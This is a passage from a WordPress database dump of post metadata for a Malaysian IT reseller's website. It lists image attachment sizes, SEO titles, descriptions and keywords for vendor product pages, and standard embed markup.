g-small\";a:4:{s:4:\"file\";s:13:\"4-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:13:\"4-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:13:\"4-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:11:\"4-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2307,2018,'_wp_attached_file','2018/12/5.jpg'),(2308,2018,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1129;s:6:\"height\";i:560;s:4:\"file\";s:13:\"2018/12/5.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"5-300x149.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:149;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:13:\"5-768x381.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:381;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:14:\"5-1024x508.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:508;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:13:\"5-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:13:\"5-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:13:\"5-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:11:\"5-20x10.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:10;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2309,1632,'_yoast_wpseo_content_score','60'),(2312,2024,'_edit_lock','1546590362:1'),(2313,2024,'_edit_last','1'),(2314,2024,'_wp_page_template','template-fullwidth.php'),(2315,2024,'_hide_page_title',''),(2316,2024,'_hide_header',''),(2317,2024,'_hide_footer',''),(2318,2024,'_hide_breadcrumb',''),(2319,2024,'_cover',''),(2320,2024,'_show_excerpt',''),(2321,2024,'_wc_apply_product',''),(2322,2024,'_yoast_wpseo_content_score','60'),(2323,2029,'_wp_attached_file','2018/12/bluejean.png'),(2324,2029,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:418;s:4:\"file\";s:20:\"2018/12/bluejean.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"bluejean-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"bluejean-300x122.png\";s:5:\"width\";i:300;s:6:\"height\";i:122;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"bluejean-768x314.png\";s:5:\"width\";i:768;s:6:\"height\";i:314;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"bluejean-1024x418.png\";s:5:\"width\";i:1024;s:6:\"height\";i:418;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:20:\"bluejean-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:20:\"bluejean-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:20:\"bluejean-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:17:\"bluejean-20x8.png\";s:5:\"width\";i:20;s:6:\"height\";i:8;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2325,2035,'_edit_lock','1569205003:1'),(2326,2035,'_edit_last','1'),(2327,2035,'_yoast_wpseo_content_score','60'),(2330,1571,'_yoast_wpseo_metadesc','Panasonic Tougbook Official Reseller for Malaysia. Toughbook computers, tablets and handhelds are built for the world\'s toughest users â€“ those who do extraordinary things in extraordinary places. Shock-Protected HDDs & Hard Disks. Up to 18+ Hours of Usage. 7x More Reliable! Maximise uptime. Powered by Intel. Ease of use. Tailored solution. Higher productivity. Lower cost. Types: Aviation Sector, Construction Sector, Defence Sector, Emergency Services, Engineering Sector.'),(2331,1571,'_yoast_wpseo_content_score','30'),(2332,2048,'_edit_lock','1569893585:1'),(2333,2048,'_edit_last','1'),(2334,2049,'_wp_attached_file','2018/12/comp-device.jpg'),(2335,2049,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:250;s:6:\"height\";i:250;s:4:\"file\";s:23:\"2018/12/comp-device.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"comp-device-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:23:\"comp-device-250x150.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:21:\"comp-device-20x20.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2336,2050,'_wp_attached_file','2018/12/printer-1.jpg'),(2337,2050,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:250;s:6:\"height\";i:250;s:4:\"file\";s:21:\"2018/12/printer-1.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"printer-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:21:\"printer-1-250x150.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:19:\"printer-1-20x20.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2338,2051,'_wp_attached_file','2018/12/scanning.jpg'),(2339,2051,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:250;s:6:\"height\";i:250;s:4:\"file\";s:20:\"2018/12/scanning.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"scanning-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:20:\"scanning-250x150.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:18:\"scanning-20x20.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2340,2052,'_wp_attached_file','2018/12/wearable-device.jpg'),(2341,2052,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:250;s:6:\"height\";i:250;s:4:\"file\";s:27:\"2018/12/wearable-device.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"wearable-device-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:27:\"wearable-device-250x150.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:25:\"wearable-device-20x20.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2342,2048,'_wp_page_template','template-fullwidth.php'),(2343,2048,'_hide_page_title',''),(2344,2048,'_hide_header',''),(2345,2048,'_hide_footer',''),(2346,2048,'_hide_breadcrumb',''),(2347,2048,'_cover',''),(2348,2048,'_show_excerpt',''),(2349,2048,'_wc_apply_product',''),(2350,2048,'_yoast_wpseo_content_score','60'),(2351,1435,'_yoast_wpseo_content_score','60'),(2352,2073,'_edit_lock','1569900111:1'),(2353,2073,'_edit_last','1'),(2354,2073,'_yoast_wpseo_content_score','60'),(2355,2048,'_yoast_wpseo_metadesc','Honeywellâ€™s solutions enhance productivity and safety for more than half a billion workers annually. Our productivity solutions include a mix of products, from rugged mobile computers, voice-enabled software and workflows, bar code scanners, and printing solutions.'),(2356,1608,'_yoast_wpseo_focuskw','veeam'),(2357,1608,'_yoast_wpseo_linkdex','79'),(2419,1690,'_aioseop_title','Video Conferencing'),(2418,1690,'_aioseop_description','Get a Logitech Video Conferencing Solutions from Logitech Video Collaboration Official Partner, Bintara Solutions Sdn Bhd'),(2362,1690,'_yoast_wpseo_focuskw','Logitech Video Conferencing'),(2363,1690,'_yoast_wpseo_title','Get a Video Conferencing Quote %%sep%% %%sitename%%'),(2364,1690,'_yoast_wpseo_metadesc','Get a Logitech Video Conferencing Solutions from Logitech Video Collaboration Official Partner, Bintara Solutions Sdn Bhd'),(2365,1690,'_yoast_wpseo_linkdex','59'),(2369,2080,'_wp_attached_file','2018/12/office-printer.png'),(2370,2080,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:594;s:6:\"height\";i:445;s:4:\"file\";s:26:\"2018/12/office-printer.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"office-printer-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"office-printer-300x225.png\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:26:\"office-printer-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:26:\"office-printer-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:26:\"office-printer-594x400.png\";s:5:\"width\";i:594;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2371,1528,'_yoast_wpseo_content_score','60'),(2649,1551,'_aioseop_title','Microsoft Solutions'),(2378,1551,'_yoast_wpseo_content_score','60'),(2648,1551,'_aioseop_description','Get Microsoft solutions from Microsoft Certified Partner. '),(2383,1551,'_yoast_wpseo_focuskw','Microsoft Office 365'),(2384,1551,'_yoast_wpseo_linkdex','60'),(2476,1435,'_yoast_wpseo_metadesc','ACRONIS BACKUP SOFTWARE FOR BUSINESS'),(2387,1528,'_yoast_wpseo_metadesc','These printers are ideal for individual or multiuser environments, delivering high-quality applications, from black and white CAD drawings to color presentations, while tools like automatic media-roll alignment and accurate print previews help streamline workflows and ensure efficiency.'),(2388,2086,'_wp_attached_file','2018/12/APC_LockupLogo_tcm267-134996.png'),(2389,2086,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:305;s:6:\"height\";i:146;s:4:\"file\";s:40:\"2018/12/APC_LockupLogo_tcm267-134996.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:40:\"APC_LockupLogo_tcm267-134996-150x146.png\";s:5:\"width\";i:150;s:6:\"height\";i:146;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:40:\"APC_LockupLogo_tcm267-134996-300x144.png\";s:5:\"width\";i:300;s:6:\"height\";i:144;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:40:\"APC_LockupLogo_tcm267-134996-300x146.png\";s:5:\"width\";i:300;s:6:\"height\";i:146;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:38:\"APC_LockupLogo_tcm267-134996-20x10.png\";s:5:\"width\";i:20;s:6:\"height\";i:10;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2390,1438,'_yoast_wpseo_focuskw','APC'),(2391,1438,'_yoast_wpseo_linkdex','67'),(5319,2000,'_aioseop_description','Logitech GROUP Video Conferencing System for mid to large rooms'),(2394,2000,'_yoast_wpseo_focuskw','Logitech Group'),(2395,2000,'_yoast_wpseo_linkdex','84'),(2501,1568,'_aioseop_title','NVivo '),(2500,1568,'_aioseop_description','Get a quote for NVivo Qualitative Data Analysis Software from Bintara Solutions Sdn Bhd. '),(2401,1568,'_yoast_wpseo_focuskw','NVivo'),(2402,1568,'_yoast_wpseo_title','NVivo Qualitative Data Analysis Software %%sep%% %%sitename%%'),(2403,1568,'_yoast_wpseo_metadesc','Get a quote for NVivo Qualitative Data Analysis Software from Bintara Solutions Sdn Bhd. NVivo is qualitative data analysis software for researchers working on Windows and Mac operating systems'),(2404,1568,'_yoast_wpseo_linkdex','83'),(2405,2000,'_oembed_14927221436be7e71316737e9ac10f6a','<blockquote class=\"wp-embedded-content\" data-secret=\"Kxda6FfJUG\"><a href=\"https://bintara.com.my/get-quotation-logitech/\">Get Quotation (Logitech)</a></blockquote><iframe class=\"wp-embedded-content\" sandbox=\"allow-scripts\" security=\"restricted\" style=\"position: absolute; clip: rect(1px, 1px, 1px, 1px);\" src=\"https://bintara.com.my/get-quotation-logitech/embed/#?secret=Kxda6FfJUG\" data-secret=\"Kxda6FfJUG\" width=\"600\" height=\"338\" title=\"&#8220;Get Quotation (Logitech)&#8221; &#8212; Bintara Solutions Sdn Bhd (BINTARA)\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>'),(2406,2000,'_oembed_time_14927221436be7e71316737e9ac10f6a','1544711172'),(2421,1481,'_aioseop_description','Get the security, mobility, reliability, and ease of use you need to digitally transform your business, with DocuSign eSignature solutions.'),(2422,1481,'_yoast_wpseo_metadesc','Get the security, mobility, reliability, and ease of use you need to digitally transform your business, with DocuSign eSignature solutions.'),(2423,1572,'_yoast_wpseo_content_score','30'),(2424,1572,'_yoast_wpseo_focuskw','Peplink'),(2425,1572,'_yoast_wpseo_linkdex','76'),(2426,1572,'_yoast_wpseo_metadesc','SIMPLE, UNBREAKABLE BRANCH NETWORKING, ANYWHERE. From the companyâ€™s inception, we set out to create the most reliable and easiest-to-use routers. Since then, we have developed multi-WAN VPN bonding (SD-WAN) routers and access points withÂ industry-leading durability, a straightforward and intuitiveÂ web interface, and aÂ wide range of featuresÂ that are difficult to match.'),(2427,1571,'_yoast_wpseo_focuskw','Panasonic Toughbook'),(2428,1571,'_yoast_wpseo_linkdex','77'),(2431,1619,'_yoast_wpseo_focuskw','Zebra'),(2432,1619,'_yoast_wpseo_linkdex','73'),(2433,1619,'_yoast_wpseo_metadesc','More is expected of you every day, and as a result, you expect more from your technology -- more efficiency, more accuracy, more durability. That is why Zebra engineers scanners, mobile computers, tablets and printers with one purpose -- to help you perform even better.'),(2434,2000,'_oembed_f1d248c9f328dd2d7a87fbfde1fdedb0','<blockquote class=\"wp-embedded-content\" data-secret=\"5Si5zxG1uT\"><a href=\"https://bintara.com.my/get-quotation-logitech/\">Get Quotation (Logitech)</a></blockquote><iframe class=\"wp-embedded-content\" sandbox=\"allow-scripts\" security=\"restricted\" style=\"position: absolute; clip: rect(1px, 1px, 1px, 1px);\" src=\"https://bintara.com.my/get-quotation-logitech/embed/#?secret=5Si5zxG1uT\" data-secret=\"5Si5zxG1uT\" width=\"600\" height=\"338\" title=\"&#8220;Get Quotation (Logitech)&#8221; &#8212; Bintara Solutions Sdn Bhd (BINTARA)\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>'),(2435,2000,'_oembed_time_f1d248c9f328dd2d7a87fbfde1fdedb0','1544714239'),(2436,1634,'_yoast_wpseo_metadesc','GoToTraining is the right software for training, virtually or in a hybrid situation. Keep your attendees involved with in-session collaboration, Breakout sessions for small groups, detailed analytics and more.'),(2437,1633,'_yoast_wpseo_metadesc','GoToWebinar erases the headache and hassle from webinars. No matter your goal or skill level, youâ€™ll quickly see why so many love GoToWebinar. Go from preparing a webinar to presenting in fewer steps â€“ and have a lot of fun along the way.'),(2438,1610,'_yoast_wpseo_focuskw','WACOM'),(2439,1610,'_yoast_wpseo_metadesc','PROVIDER OF ELECTRONIC SIGNATURE PADS, PEN DISPLAYS AND MOBILE SIGNATURE SOLUTIONS.'),(2440,1610,'_yoast_wpseo_linkdex','66'),(2441,1610,'_yoast_wpseo_content_score','30'),(2477,1438,'_yoast_wpseo_metadesc','INFRASTRUCTURE SOLUTIONS FOR HOME AND OFFICE. From battery backups that safeguard against outages at home, to full-scale data center infrastructure, our offers can help your home and business become more efficient, reliable, and connected.'),(2478,1440,'_yoast_wpseo_metadesc','ARUBA NETWORKING PRODUCTS. SMARTER SOLUTIONS FOR EXPERIENCE-DRIVEN NETWORKING.'),(2479,1443,'_yoast_wpseo_metadesc','ATLAS.ti is a powerful workbench for the qualitative analysis of large bodies of textual, graphical, audio and video data.'),(2480,1437,'_yoast_wpseo_metadesc','REMOTE DESKTOP SOFTWARE THAT ACTUALLY WORKS, Connect to a computer remotely, be it from the other end of the office or halfway around the world. AnyDesk ensures secure and reliable remote desktop connections for IT professionals and on-the-go individuals alike.'),(2481,1447,'_yoast_wpseo_metadesc','Ideal for lights-on presentations in bright meeting rooms, BenQ business projectors produce high brightness for effective teamwork, collaboration, and note-taking. The high-lumen output ensures brilliant picture quality with vibrant colors as well as crisp text.'),(2482,1451,'_yoast_wpseo_metadesc','SOLUTIONS FOR ALL YOUR WIRELESS NEEDS, Connectivity provides immediate access to information and improves efficiency throughout the business. Small and medium businesses can move fast to integrate technology into their business process and experience the benefits.'),(2483,1450,'_yoast_wpseo_metadesc','SIMPLY THE BEST VIDEO CONFERENCING & ONLINE MEETINGS. With Cisco Webex Meetings, joining is a breeze, audio and video are clear, and screen sharing is easier than ever. We help you forget about the technology, to focus on what matters.'),(2484,1472,'_yoast_wpseo_metadesc','CorelDRAWÂ® Graphics Suite 2018 is a leading graphic design software enjoyed by millions of professionals, small business owners, and design enthusiasts worldwide. It offers a seamless design experience for graphics, layout, illustration, photo editing, tracing, web images, print projects, art, typography, and more. Design with confidence and achieve stunning results.'),(2485,1473,'_yoast_wpseo_metadesc','SMALL BUSINESS SOLUTIONS, Every business starts out small. We did. And we know from experience the benefits of having the right tools. Tools that help you grow, and grow with you. Tools that let small teams have a big impact.'),(2486,1484,'_yoast_wpseo_metadesc','FARONICS PRODUCT SOLUTIONS, Deep FreezeDeep Freeze makes workstation configurations indestructible. Guarantees 100% workstation recovery upon every restart.'),(2487,1632,'_yoast_wpseo_focuskw','gotomeeting'),(2488,1632,'_yoast_wpseo_metadesc','GOTOMEETING MAKES IT EASY TO CONNECT WITH PEOPLE ANY WAY YOU WANT.'),(2489,1632,'_yoast_wpseo_linkdex','52'),(2490,1634,'_yoast_wpseo_focuskw','gototraining'),(2491,1634,'_yoast_wpseo_linkdex','67'),(2492,1633,'_yoast_wpseo_focuskw','GoToWebinar'),(2493,1633,'_yoast_wpseo_linkdex','71'),(2494,2048,'_yoast_wpseo_focuskw','honeywell\'s'),(2495,2048,'_yoast_wpseo_linkdex','67'),(2502,2126,'_wp_attached_file','2018/12/qator-live.png'),(2503,2126,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1310;s:6:\"height\";i:842;s:4:\"file\";s:22:\"2018/12/qator-live.png\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"qator-live-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"qator-live-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"qator-live-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"qator-live-1024x658.png\";s:5:\"width\";i:1024;s:6:\"height\";i:658;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:22:\"qator-live-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:22:\"qator-live-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:22:\"qator-live-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:20:\"qator-live-20x13.png\";s:5:\"width\";i:20;s:6:\"height\";i:13;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2504,2127,'_wp_attached_file','2018/12/qator-live.jpg'),(2505,2127,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:294;s:6:\"height\";i:126;s:4:\"file\";s:22:\"2018/12/qator-live.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"qator-live-150x126.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:126;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:19:\"qator-live-20x9.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:9;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2506,1573,'_yoast_wpseo_content_score','30'),(2507,1573,'_yoast_wpseo_focuskw','Qator Live'),(2508,1573,'_yoast_wpseo_linkdex','55'),(2509,1573,'_yoast_wpseo_metadesc','QATORLIVE IS LIVE FORENSIC SOLUTION TO COLLECT AND ANALYZE DIGITAL EVIDENCE ON THE SPOT.'),(2510,1605,'_yoast_wpseo_focuskw','TeamViewerÂ '),(2511,1605,'_yoast_wpseo_metadesc','TeamViewerÂ focuses on cloud-based technologies to enable online remote support and collaboration globally. To thrive now and in the coming years, businesses and individuals need remote desktop support, remote access, and online collaboration to be able to connect worldwide. TeamViewer is at the forefront of that innovation.'),(2512,1605,'_yoast_wpseo_linkdex','75'),(2513,1606,'_yoast_wpseo_focuskw','Ubiquiti'),(2514,1606,'_yoast_wpseo_metadesc','Technology platforms for Internet Access, Enterprise, and SmartHome applications.'),(2515,1606,'_yoast_wpseo_linkdex','43'),(2516,1606,'_yoast_wpseo_content_score','60'),(2517,1608,'_yoast_wpseo_metadesc','AVAILABILITY SOLUTIONS THAT FIT YOUR BUSINESS NEEDS AND BUDGET'),(2518,2003,'_yoast_wpseo_focuskw','Video 